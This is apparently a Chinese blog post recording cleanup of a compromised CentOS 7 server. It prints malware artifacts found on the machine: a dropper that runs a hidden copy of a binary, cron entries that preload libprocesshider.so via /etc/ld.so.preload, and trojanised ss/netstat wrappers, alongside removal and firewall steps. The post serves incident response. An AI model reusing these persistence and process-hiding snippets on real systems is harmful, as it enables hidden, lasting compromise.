-rwxrw-rw- 1 root root 1.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/button_stop.gif
-rwxrw-rw- 1 root root 1.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/icon.png
-rwxrw-rw- 1 root root 54 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/rule.gif
-rwxrw-rw- 1 root root 1.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/state0.gif
-rwxrw-rw- 1 root root 1.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/state1.gif
-rwxrw-rw- 1 root root 1.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/state2.gif
-rwxrw-rw- 1 root root 1.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/state3.gif
-rwxrw-rw- 1 root root 3.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/supervisor.gif
-rwxrw-rw- 1 root root 2.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/status.html
-rwxrw-rw- 1 root root 3.6K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/stylesheets/supervisor.css
-rwxrw-rw- 1 root root 691 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/tail.html
-rwxrw-rw- 1 root root 6 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/version.txt
-rw-r--r-- 1 root root 23K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/web.py
-rw-r--r-- 1 root root 20K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/web.pyc
-rw-r--r-- 1 root root 22K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/xmlrpc.py
-rw-r--r-- 1 root root 23K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/xmlrpc.pyc
-rwxr-xr-x 1 root root 954K 10月 14 11:37 /usr/sbin/https
-rwxr-xr-x 1 root root 116 10月 14 11:37 /usr/sbin/httpss
-rwxrwxrwx. 1 root root 39 10月 14 11:37 /usr/sbin/ss
-rw-r--r-- 1 root root 284K 10月 14 11:30 /var/log/sa/sa14
-rw-r--r-- 1 root root 1 10月 14 11:38 /var/log/syslog
-rw-rw---- 1 root mail 0 10月 14 11:37 /var/spool/mail/ftp2

查询以上可疑文件[root@centos7 lib]# rpm -qf /usr/sbin/ss
iproute-3.10.0-87.el7.x86_64
[root@centos7 lib]# rpm -qf /usr/sbin/https 查看执行文件属于哪个包
文件 /usr/sbin/https 不属于任何软件包
[root@centos7 lib]# rpm -qf /usr/sbin/https
https httpss
[root@centos7 lib]# rpm -qf /usr/sbin/https
https httpss
[root@centos7 lib]# rpm -qf /usr/sbin/httpss
文件 /usr/sbin/httpss 不属于任何软件包

[root@centos7 lib]# cat /usr/sbin/httpss

#!/bin/bash
cd /sbin 2>/dev/null
cp -f -- https .sh 2>/dev/null
./.sh -c  >/dev/null 2>&1
rm -rf -- .sh 2>/dev/null
看上面的脚本将https复制为.sh隐藏文件，运行之，然后删除。太狡猾了！！

rm -f /usr/sbin/https
rm -f /usr/sbin/httpss

注意看以上的/usr/sbin/httpss是否被cron调用

查看 /usr/sbin/ss shell脚本内容基于iss可执行文件如下：

#!/bin/sh
iss|grep -v "127.0.0.1"
exit

进一步查询iss指令，发现居然没有man手册，iss也是可疑文件

/usr/bin/nets 可执行文件
/usr/bin/netstat shell脚本基于以上的nets

/usr/bin/.bget 运行加-help参数实际为wget
/usr/bin/dget 实际为wget
/usr/bin/dpkgd/ls
/usr/bin/dpkgd/ne
/usr/bin/dpkgd/ps
/usr/bin/dpkgd/ss

/usr/bin/.funzip 一运行就cpu飙高，应该是毒，建议删除rm -f /usr/bin/.funzip

查看/etc/crontab如下：

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

*/1 * * * * root  cp -f -r -- /etc/.sh /tmp/.sh 2>/dev/null && /tmp/.sh -c  >/dev/null 2>&1 && rm -rf -- /tmp/.sh 2>/dev/null
* * * * * root  echo /usr/local/lib/libprocesshider.so > /etc/ld.so.preload && lockr +i /etc/ld.so.preload >/dev/null 2>&1
0 */4 * * * root /etc/profile.d/php.sh
*/3 * * * * root /etc/sphp >/dev/null 2>&1

lsattr /etc/crontab -l
chattr -ai /etc/crontab
将以上的内容注释

/etc/profile.d/php.sh内容如下：

#!/bin/bash
cat /etc/.qucfu.pid | xargs -I % kill -9 % >/dev/null 2>&1
sleep 0.5
cp -f -r -- /bin/shh /bin/.sh 2>/dev/null
sleep 0.5
/bin/.sh -c  >/dev/null 2>&1
rm -rf -- .sh 2>/dev/null

/etc/profile.d/supervisor.sh内容如下：

#!/bin/bash
supervisord -c /etc/.supervisor/supervisord.conf >/dev/null 2>&1
supervisorctl reload >/dev/null 2>&1

/etc/rc.d/rc.local或者/etc/rc.local中查看开机启动项目

which ps
file /usr/bin/ps 发现是empty 文件，草太不讲究了，把ps都废了

find查找精确时间段文件的方法：https://blog.csdn.net/weixin_33763244/article/details/91820306

此次中毒被利用了so动态库，参考：警惕利用Linux预加载型恶意动态链接库的后门
https://www.freebuf.com/column/162604.html

Linux中删不掉的文件——隐藏权限（lsattr、chattr命令）
https://blog.csdn.net/qq_37212828/article/details/102810514
模式
a：让文件或目录仅供附加用途；
b：不更新文件或目录的最后存取时间；
c：将文件或目录压缩后存放；
d：将文件或目录排除在倾倒操作之外；
i：不得任意更动文件或目录；
s：保密性删除文件或目录；
S：即时更新文件或目录；
u：预防意外删除

限制进程的cpu使用率yum install cpulimit cpulimit -p 2626 -l 0.1 参考：http://www.ttlsa.com/tools/cpulimit-limit-cpu-usage-on-linux/
实际需要nohup cpulimit -p 2626 -l 0.1 &
可疑进程 .sh longbak
根据进程id查看网络连接lsof -p 2626 或者lsof - p 2626 -n
以上发现不断有.sh进程访问网络 lsof找到对外的连接直接在iptables -I OUTPUT -d xxx.xx.xx.xx -j drop 找出所有的ip 全部drop 最后别忘了service
发现了访问目标tproxy端口（网上搜索为8081端口） top 按c可查看具体的程序路径
iptables save规则

/bin/.sh和/usr/bin/.sh 一直存在，可自己touch出这2个文件，然后chattr +i 这2个文件防止被病毒复制修改

参考：https://www.jb51.net/article/167765.htm
https://blog.csdn.net/charliemunger/article/details/103610648

/proc/pid/net中如何限制进程访问网络呢？？？

posted @ 2020-10-20 13:25 helloweifa 阅读(859) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

helloweifa

记录一次linux centos7被hack的填坑记录-20201015

公告